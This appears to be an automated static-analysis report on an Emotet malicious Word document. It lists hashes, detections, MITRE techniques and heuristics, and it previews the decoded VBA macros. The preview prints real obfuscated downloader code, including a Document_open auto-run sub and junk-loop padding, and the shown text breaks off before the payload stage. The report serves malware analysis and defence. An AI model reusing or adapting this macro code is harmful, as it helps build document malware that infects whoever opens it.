Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 794320090de98510…

MALICIOUS

Office (OLE)

Size: 247.6 KB
Created: 2020-01-16 19:41:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 0957a6bc89ead400b22ba61af73a58d8
SHA-1: 1df35316836cb60e07ef88d08cc96de50b340f4f
SHA-256: 794320090de985103e3c7a37d2e529cc41fa3df9f2e07be89cdb5523e9018ab9
Risk score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7543223-0', strongly suggesting the Emotet family. The presence of a Document_Open VBA macro indicates an attempt to automatically execute malicious code upon opening the document. This macro likely facilitates the download and execution of a secondary payload, a common Emotet tactic.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7543223-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7543223-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11312 bytes
SHA-256: 28c5af35284c8d00231ca3b3ecf6285bedc33485a2946e154a9617c022fa1ae8

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Mkogkihsdbaz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Cbmgjvguo
End Sub

Attribute VB_Name = "Wfxxsret"
Attribute VB_Base = "0{689FBB8D-9D2F-44F5-A8F6-3E8196D7914A}{28AAC8F4-CCE3-4E61-A822-40D7067799DF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zpbptpwy"
Function Lvqafoet()
   Do While Jqddglyic = 900
            Do While Aphlylca = 3 + 2
            Uribmlse = Chr(4)
            Iarckqsbwnyj = Sqr(9) + Bvvrtrduq
            Zubtafdrcsa = CLng(Bhtbesel)
            Arqblspn = Int(1 + 1)
            Okwrhvhvrmn = CDate(QKoWc)
            Qqlybqxydwrbc = 9 + Int(4)
            Loop
            Do While Symeqjpql = 2 + 4
            Iljtppyuzlzt = CLng(Mqlofpeldcsai)
            Azawhimojgb = Int(1 + 4)
            Lssfyhdte = 2 + Int(3)
            Mpxigaphm = Chr(6)
            Lzwgoabbhdnxa = Sqr(7) + Nbbhtwxtks
            Iirupamh = CDate(QKoWc)
            Loop
Loop
Lzwqhezwzla = ChrW(wdKeyP)
   Do While Nppgwmvm = 900
            Do While Jcjftwbi = 3 + 2
            Keelgoyqkzciz = Chr(4)
            Zstnrxpmhkd = Sqr(9) + Delalppjkeaio
            Jabcnote = CLng(Hbusxacpzmgo)
            Kggpnsfdrnchj = Int(1 + 1)
            Kkzcfenurn = CDate(QKoWc)
            Sotvvyfrgheqp = 9 + Int(4)
            Loop
            Do While Jhqprbeoc = 2 + 4
            Wswlpcjvmo = CLng(Gjdjedgjnqzd)
            Xmvoaqpj = Int(1 + 4)
            Uvrbgucplqj = 2 + Int(3)
            Szlvxygstyo = Chr(6)
            Zyohbxhqojlec = Sqr(7) + Jswsqzdopvs
            Ubwdwjuebdolz = CDate(QKoWc)
            Loop
Loop
Vukgbsnnzi = Lzwqhezwzla + Wfxxsret.Trgjknfy + Wfxxsret.Ckzxsvyp
   Do While Fillrazgzm = 900
            Do While Dgccgvxtwyrjo = 3 + 2
            Ksakshtufpg = Chr(4)
            Kvhywookwsr = Sqr(9) + Qohqbwojpo
            Mqklwmaj = CLng(Bqtnaogoz)
            Gremoojxhvhi = Int(1 + 1)
            Yeyzfrfgin = CDate(QKoWc)
            Nwadboqggygyh = 9 + Int(4)
            Loop
            Do While Mzmuixebkio = 2 + 4
            Pajqwramweu = CLng(Pczxzsgbtgvt)
            Juqumtzqgppcp = Int(1 + 4)
            Pvrbqhbb = 2 + Int(3)
            Woqwtnworr = Chr(6)
            Jhzszwkix = Sqr(7) + Xdldsrshs
            Qeiunbtnxh = CDate(QKoWc)
            Loop
Loop
Fack = Wfxxsret.Ndheetroisal.Tag
Pucjiaykdqvhk = Split(Vukgbsnnzi + LTrim(LTrim(Fack)), "9_msnnj883hn///")
   Do While Xtcdrargdamm = 900
            Do While Gfetlwiqjd = 3 + 2
            Boinogoz = Chr(4)
            Btqplidglvqc = Sqr(9) + Eeqclgkyfq
            Xplgxaan = CLng(Cvlzndrcky)
            Ijpmocjdnaqil = Int(1 + 1)
            Fxqbhfuburls = CDate(QKoWc)
            Dgzjxgbrl = 9 + Int(4)
            Loop
            Do While Dawcfcoaimeuw = 2 + 4
            Ohuudjcxktrz = CLng(Toledefxz)
            Wsytymcxest = Int(1 + 4)
            Hobdmindaup = 2 + Int(3)
            Pthnqifggred = Chr(6)
            Objnzsuxp = Sqr(7) + Lrbkvxjw
            Jpqblrlbwxzba = CDate(QKoWc)
            Loop
Loop
Lvqafoet = Cnxubhvfs + Join(Pucjiaykdqvhk, "") + Cnxubhvfs
   Do While Tfpdjnajsfx = 900
            Do While Qitmvatndj = 3 + 2
            Bxjsolej = Chr(4)
            Qvuziartbelfh = Sqr(9) + Orpzzpwod
            Rqdtsgtusxr = CLng(Svjivowqllau)
            Rguhqrtjap = Int(1 + 1)
            Fmnfjxvyge = CDate(QKoWc)
            Splzfedzdwb = 9 + Int(4)
            Loop
            Do While Qaeyjvuzjijcg = 2 + 4
            Yqcnbgob = CLng(Evlijikzhtwr)
            Ilnjgbwycaamt = Int(1 + 4)
            Rczyefziqa = 2 + Int(3)
            Cyjghqfepseue = Chr(6)
            Tliwpwnqr = Sqr(7) + Vrjcx
... (truncated)